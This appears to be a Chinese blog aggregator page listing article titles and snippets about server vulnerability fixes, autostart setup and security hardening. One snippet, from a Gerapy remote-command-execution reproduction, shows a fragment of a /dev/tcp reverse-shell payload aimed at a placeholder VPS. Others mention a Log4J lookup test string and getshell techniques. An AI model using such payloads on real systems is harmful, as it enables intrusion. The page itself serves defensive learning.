windows服务器漏洞修复

Deepin设置接受从Windows的远程桌面连接

例如用远程桌面连接Windows服务器/台式机,Xshell连接Linux服务器/台式机;还有更多的工具,包括QQ远程协助、TeamView(越来越不友好,基本弃用)、向日葵等等;不过大部分的Linux
长孤秋落·2023-09-23 12:21

tomcat开机自启动 java的jar包、redis、nginx服务实现开机启动

文章目录一、tomcat-windows服务器自启动1.设置文件权限2.加入服务器服务3.tomcat修改配置文件ip为服务器真实ip二、其他1.其他2.jar包自启动3.redis自启动4.nginx
gys9895·2023-09-23 06:45

redis漏洞修复:(CNVD-2019-21763)

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档文章目录前言一、漏洞内容二、镜像准备1.确认镜像版本2.下载镜像三、配置文件准备1.获取配置文件2.修改配置文件四、启动redis容器五、修改iptables文件总结前言漏扫发现机器上基于容器运行的redis的访问权限没有限制,需要增加安全配置。现在使用的7.0.4版本,正好一起升级版本。由于redis使用的是容器形式运行,所以防火墙
大新新大浩浩·2023-09-22 21:48

服务器操作系统到底用win还是linux好?

服务器操作系统用win还是linux好一:稳定性对比Linux稳定性更好,Linux更新无需重启,不会停止server,这才是真正的server;Linux服务器相对windows服务器,宕机机率更低;
xiaoweids·2023-09-22 17:36

未授权访问漏洞大全

本文涵盖漏洞描述、漏洞检测和漏洞修复建议为一体,深层次利用不在本文,可自行网上搜索。未授权访问漏洞介绍未授权访问漏洞是一个在企业内部非常常见的问题,未授权访问可以理解为需要
yggcwhat·2023-09-22 09:51

Log4J2漏洞修复方法验证及最终方案

验证代码准备:在项目登录接口中增加类似如下代码:@PostMapping("login")publicRlogin(@RequestBodyLoginBodyform){//form.getUsername()="${java:version}"logger.info("登录:{}",form.getUsername());//用户登录LoginUseruserInfo=sysLoginServi
DbzZcz·2023-09-22 05:07

windows时时查看项目的log文件日志

tomcat项目在内网的windows服务器上运行,想要时时查看日志文件内容,每次远程桌面弄的心烦按以下方法搞定1、将内网服务器上的log文件夹共享,加上几个开发的人的电脑账号,只读。
Debug-ya·2023-09-21 08:16

redis漏洞修复:CVE-2022-35977、CVE-2023-22458、CVE-2023-28856

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档文章目录前言一、漏洞内容二、现状三、更新redis下载镜像停止已有的容器启动新的容器四、更新后的版本1.查看日志2.查看版本总结前言漏扫发现机器上的redis版本有点低,需要升级版本修复漏洞一、漏洞内容RedisLabsRedis输入验证错误漏洞(CVE-2022-35951)Redis输入验证错误漏洞(CVE-2023-22458)
大新新大浩浩·2023-09-21 07:11

jenkins部署 java项目到远程 windows服务器

jenkins部署java项目到远程windows服务器1、查看windows服务器是否有ssh服务。
李君临·2023-09-20 23:58

如何通过局域网共享文件

需求环境:公司有多个部门,不同用户与部门使用不同文件业务背景:一台windows服务器,若干客户端需要技能:熟悉windows系统管理,包含计算机管理、硬盘管理、用户管理、shareandstoragemanagement
jekc868·2023-09-20 00:17

SSH&SSL弱加密算法漏洞修复

一、SSHSSH的配置文件中加密算法没有指定,默认支持所有加密算法,包括arcfour,arcfour128,arcfour256等弱加密算法。修改SSH配置文件,添加加密算法:vi/etc/ssh/sshd_configCiphersaes128-ctr,aes192-ctr,aes256-ctr,aes128-cbc,3des-cbc最后面添加以下内容(去掉arcfour,arcfour128
a5ae844909d8·2023-09-19 12:13

织梦dedecms5.7漏洞修复大全

织梦dedecms漏洞修复大全任意文件上传漏洞修复一、/include/dialog/select_soft_post.php文件,搜索(大概在72行的样子)二、后台文件任意上传漏洞三、/include
徊忆羽菲·2023-09-19 02:59

Spring WebFlux使用未加前缀的双通配符模式绕过安全性CVE-2023-34034

文章目录0.前言漏洞漏洞介绍描述1.参考文档2.基础介绍3.解决方案3.1.升级版本4.漏洞修复源码分析5.漏洞利用示例0.前言背景:公司项目扫描到WebFlux中使用"**"作为模式会导致SpringSecurity
冰点.·2023-09-18 13:34

毕业前的87天--距离毕业的第82天

昨天兴致冲冲把代码上线,今天就收到测试部门的三封漏洞修复要求。
北美的小狼·2023-09-16 18:59

Postgresql 14 主从配置

由于项目需要,需要在两台windows服务器上配置pgsql主从备份,记录一下流程及踩过的坑。
weixin_42395074·2023-09-16 14:55

Linux网络和安全:配置、远程访问与防御指南

网络配置及端口管理网络配置命令端口管理防火墙和安全性设置防火墙管理工具安全性设置Linux远程访问技术:SSH和VPNSSHVPNLinux软件和服务网络工具文件传输VPN技术安全审计和日志管理入侵检测和防御软件更新和漏洞修复其他安全建议容器化和虚拟化
大师兄6668·2023-09-16 08:18

Web系统常见漏洞修复

背景:在工作中,我们的交付团队在交付项目时,可能会遇到甲方会使用一些第三方工具(奇安信等)对项目代码进行扫描,特别是一些对安全性要求比较高的企业,比如涉及到一些证券公司、银行、金融等。他们会在项目上线前进行代码安全检测,通过了对方才会发布上线。正好我所在企业中的交付团队遇到了这种情况,我将最后我们团队针对一些漏洞的修复代码分享出来供大家参考,方便未来自己修复同样的漏洞,当然漏洞的种类不是很全,我会
Xin Deng·2023-09-16 01:15

nginx-gui

一、使用原因我有一个阿里云windows服务器有多个项目,有多个项目绑定。因为域名只能解析80端口。所以想到用nginx。又因为不是很懂代码操作,所以想用个图形化nginx控制面板控制就好了。
欧阳大虾·2023-09-14 22:06

Windows服务器配置开机自启动

有两种简单实现的方式。第一种,直接将可执行文件或脚本的快捷方式放置到C:\ProgramData\Microsoft\Windows\StartMenu\Programs\StartUp这个文件夹里,服务器在启动的时候会自动执行。第二种,配置为windows系统服务利用winsw来将可执行文件配置为系统服务下载地址:https://github.com/winsw/winsw根据自己机器是32还是
LO嘉嘉VE·2023-09-14 00:55

windows 服务器 应用自启动

文章目录windows服务器应用自启动前言创建服务器应用启动脚本jar包服务(start-jar.bat)内网穿透服务(公司内部的,可忽略)(start-frpc.bat)nginx服务(start-ngnix.bat
涛涛之海·2023-09-14 00:25

Windows服务器exe程序无法开机自启动解决办法

Windows服务器exe程序无法开机自启动问题背景解决办法1.新建*.reg*文件,将下面的代码放到reg文件中2.Windows+R调用运行程序命令:*netplwiz*3.取消勾选问题背景我将exe
喜上59·2023-09-14 00:54

Webpack Sourcemap文件泄露漏洞

文件泄露漏洞前言一、Webpack和Sourcemap1.1什么是Webpack1.2什么是Sourcemap二、漏洞利用2.1使用reverse-sourcemap工具2.1直接看前端代码三、漏洞挖掘漏洞修复前言
The-Back-Zoom·2023-09-13 06:19

网络安全运维工程师(NISP-SO)需要掌握那些知识点

从“掌握核心能力”到如何“应急响应”并提高安全运维的知识水平第一阶段先导基础知识内容学生可掌握的核心能力1、能够根据企业需求,搭建基于windows服务器的网站2、能够根据企业需求,搭建基于windows
网安世纪小鹅NISP_CISP·2023-09-12 14:18

mySql数据定时备份与恢复

Windows服务器上面,要实现数据库定时备份,采用方式很多。本文通过任务计划+mysqldump的bat脚本实现数据的定时备份。mysqldump是mysql用于转存储数据库的实用程序。
Lovme_du·2023-09-12 09:16

Windows服务器安全策略配置——简单实用!

Windows服务器安全策略配置——简单实用!Windows服务器安全策略怎么做?
熬耶·2023-09-11 17:33

windows服务器自带IIS搭建网站并发布公网访问【内网穿透】

文章目录1.前言2.Windows网页设置2.1WindowsIIS功能设置2.2IIS网页访问测试3.Cpolar内网穿透3.1下载安装Cpolar3.2Cpolar云端设置3.3Cpolar本地设置4.公网访问测试5.结语1.前言在网上各种教程和介绍中,搭建网页都会借助各种软件的帮助,比如网页运行的Apache和Nginx、数据库软件MySQL和MSSQL之类,为方便用户使用,还出现了XAMP
不是笨小孩i·2023-09-11 16:17

CSRF跨站请求伪造漏洞修复

文章目录一、漏洞描述二、解决建议二、解决方法Springboot配置文件增加配置编写配置类编写过滤器提示:以下是本篇文章正文内容,下面案例可供参考一、漏洞描述跨站请求伪造(Cross-siterequestforgery,简称CSRF),是一种常见的Web安全漏洞,由于在Web请求中重要操作的所有参数可被猜测到,攻击者可通过一些技术手段欺骗用户的浏览器去访问一个用户曾经认证过的网站,遂使攻击者可冒
java难民·2023-09-11 16:14

DevSecOps 中的漏洞管理(下)

但拥有这些类型的评估以跟上安全和漏洞修复的行业标准是极其重要的。以下就是需要进行漏洞管理评估并跟上行业安全
·2023-09-11 10:40

【小5聊】Windows服务器安装宝塔部署php网站

听说php是世界上最好的编程语言,今天就用宝塔这款号称很多人用的第三方工具在windows服务器上部署php试下1、安装宝塔直接在非服务器上安装会提示下载文件2、安装宝塔从进度条可以看到,在下载php,
全栈小5·2023-09-11 04:41

Golang学习日志 ━━ 部署Gin-Vue-Admin到windows系统并启用IIS服务,顺便学习如何设置IIS反向代理

gin-vue-admin是一套国人用golang开发的后台管理系统,总体还是值得推荐的,这里记录一下如何安装到windows服务器
暂时先用这个名字·2023-09-11 02:46

springboot部署在Windows,开机自启

https://www.jianshu.com/p/af90db4b54e3用SpringBoot开发的Web项目,打包生成了一个jar包,部署在Windows服务器中,设置为开机启动方案:使用winsw
洪君_·2023-09-10 22:46

适用于国内的 NTP 服务器地址(windows时间同步)

aliyun.comtime2.aliyun.comtime3.aliyun.comtime4.aliyun.comtime5.aliyun.comtime6.aliyun.comtime7.aliyun.comWindows
allenxiong·2023-09-10 21:21

CVE-2021-32849 Gerapy远程命令执行漏洞复现

本文利用的漏洞在Gerapy&/dev/tcp/VPS的IP/VPS的端口0>&1'`"}5.5成功获取root权限0x06漏洞修复厂商已经在0.9.8版本中修复上述漏洞,用户请尽快升级到安全版本。
长白山攻防实验室·2023-09-10 15:55

等保测评 —— 安全控制点

章安全物理环境物理位置的选择物理访问控制防盗窃和防破坏防雷击防火防水和防潮防静电温湿度控制电力供应电磁防护第2章安全通信网络网络架构通信传输可信验证第3章安全区域边界访问控制入侵防范恶意代码和垃圾邮件防范安全审计可信验证第4章安全计算环境网络设备路由器交换机安全设备防火墙服务器Linux服务器windows
不懂说安全·2023-09-09 18:32

【漏洞库】Fastjson_1.2.24_rce

文章目录漏洞描述漏洞编号漏洞评级影响版本漏洞复现-利用工具-漏洞环境-漏洞扫描-漏洞验证-深度利用-GetShell-EXP编写漏洞挖掘-指纹信息修复建议-漏洞修复漏洞原理漏洞描述Fastjson存在反序列化远程代码执行漏洞
yuan_boss·2023-09-08 22:12

【漏洞库】Fastjson_1.2.47_rce

文章目录漏洞描述漏洞编号漏洞评级影响版本漏洞复现-利用工具-漏洞环境-漏洞扫描-漏洞验证-深度利用-GetShell-EXP编写漏洞挖掘-寻找入口点-指纹信息修复建议-漏洞修复漏洞原理漏洞描述Fastjson
yuan_boss·2023-09-08 22:10

IIS短文件名漏洞修复

短文件名原因:当IIS接收到一个文件路径中包含~的请求时,根据文件是否存在返回值是不同的解决办法:IIS6.0可以安装urlscan,配置禁止url中含有“~”;IIS7.0以上可以安装URLWriter工具,配置禁止url中含有“~”;IS6.0urlscan下载以及配置URLWriter官网下载UrlWriter配置在webconfig的节点中加入配置上这一句可以解决HOST头攻击的漏洞```
我一如初见·2023-09-08 16:21

Openssh算法协议上的漏洞修复-Diffie-Hellman Key Agreement Protocol 资源管理错误漏洞(CVE-2002-20001)

mansshd_config|grep-A40-wKexAlgorithmsecho"KexAlgorithmscurve25519-sha256,[email protected],ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521">>/etc/ssh/sshd_configsystemctlrestartss
wcy10086·2023-09-08 15:53

jumpserver连不上windows服务器主机有可能的原因

1、不把虚拟机挂起2、没清空浏览器缓存,这个比较有可能(亲测证实,其他的只是可能暂没证实)3、防火墙没设置允许New-NetFirewallRule-Namesshd-DisplayName'OpenSSHServer(sshd)'-EnabledTrue-DirectionInbound-ProtocolTCP-ActionAllow-LocalPort22
pzython·2023-09-08 08:45

【1day】iRDM4000智慧站房管理员密码重置漏洞学习

目录一、漏洞描述二、资产测绘三、漏洞复现四、漏洞修复一、漏洞描述iRDM4000智慧站房是一种用于在线监管、诊断和配置子站的智能设备。
xiaochuhe.·2023-09-07 18:28

操作系统攻击:早期WindowsMS10-046漏洞

目录概述漏洞成因利用过程漏洞复现漏洞修复概述本次介绍早期的windows高危漏洞——MS10_046_SHORTCUT_ICON_DLLLOADER,该漏洞可以通过浏览器跳转网络资源的方式利用,结合xss
昵称还在想呢·2023-09-07 12:32

常见安全漏洞整理

文章目录常见安全漏洞整理Q1-越权漏洞Q2-CSRF漏洞漏洞简介漏洞危害漏洞产生流程漏洞防护Q3-逻辑漏洞漏洞简介漏洞场景1、绕过限制获取利益场景描述漏洞修复2、并发攻击场景描述漏洞修复3、浮点精度利用场景描述漏洞修复
蚕豆糯米饭·2023-09-07 10:45

漏洞修复-SSH版本信息可被获取漏洞

漏洞修复-SSH版本信息可被获取漏洞1、背景2、环境3、思路4、实操1、背景新分配下来的云服务,在没有投入生产环境之前,漏扫和安全防固是两项基本工作。
水步天·2023-09-07 09:16

基于SSRF漏洞复现引发的CRLF之(session会话固定+XSS)组合拳利用思路

文章目录前言Redis通信协议RESPSSRF利用HTTP头注入+Redis通信协议Getshell引发思考引出CRLF漏洞CRLF概念漏洞危害漏洞检测挖掘技巧修复建议引出会话固定漏洞漏洞原理漏洞检测漏洞利用漏洞修复
yuan_boss·2023-09-07 06:55

Centos7设置设置时间与windows同步

CentOS7设置时间与windows同步使用ntp使CentOS服务器的系统时间与机器时间同步于windows服务器centOS机器安装ntpwindows安装ntp同步时间使用ntp使CentOS服务器的系统时间与机器时间同步于
JavaDevelopmentDM·2023-09-06 20:06

Ruijie SSL V P N 垂直越权漏洞

RuijieSSLVPN垂直越权漏洞——FARBS攻防实验室目录RuijieSSLVPN垂直越权漏洞1、漏洞简介2、漏洞影响3、漏洞复现4、漏洞批量检测5、漏洞修复1、漏洞简介RuijieSSLVPN垂直越权漏洞
土豆.exe·2023-09-06 15:01

CRMEB多端多语言系统文件上传0Day代审历程

最后通过审代码,绕过历史漏洞修复的补丁(文章内容可能有点少,没办法,这个代审快到了我只用了5秒)水就完事儿了……0x01、历史nDay漏洞探测:别问,问就是谷歌(小型国内CMS百度也行
土豆.exe·2023-09-06 15:23

软件工程学术顶会——ESEC/FSE 2022 议题(网络安全方向)清单、摘要与总结

热门研究方向:1.基于深度学习的漏洞检测与修复2.基于AI的自动漏洞修复3.模糊测试与漏洞发现冷门研究方向:1.多语言代码的漏洞分析2.代码审查中的软件安全3.浏览器API模糊测试未来值得研究的方向建议
riusksk·2023-09-05 14:24

【漏洞通知】JeecgBoot 修复SQL注入风险,漏洞危害等级:高危

漏洞危害等级:高危二、影响范围jeecgboot版本<3.5.4三、修复方案参考此次漏洞修复PR合并源码,
·2023-09-05 11:31

漏洞修复--OpenSSH权限提升漏洞(CVE-2021-41617)

1.漏洞描述:官方已发布安全版本修复漏洞,腾讯安全专家建议受影响的用户请尽快更新至安全版本。安全版本:OpenSSH8.8用户可根据所使用的发行版本,升级修复。查看OpenSSH版本:rpm-qa|grepopenssh升级OpenSSL版本:yum-yinstallopensshcentos7用户,建议升级到如下版本:openssh-7.4p1-22.el7_9centos8用户,建议升级到如下
上海运维Q先生·2023-09-05 09:07
上一页 5 6 7 8 9 10 11 12 下一页
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他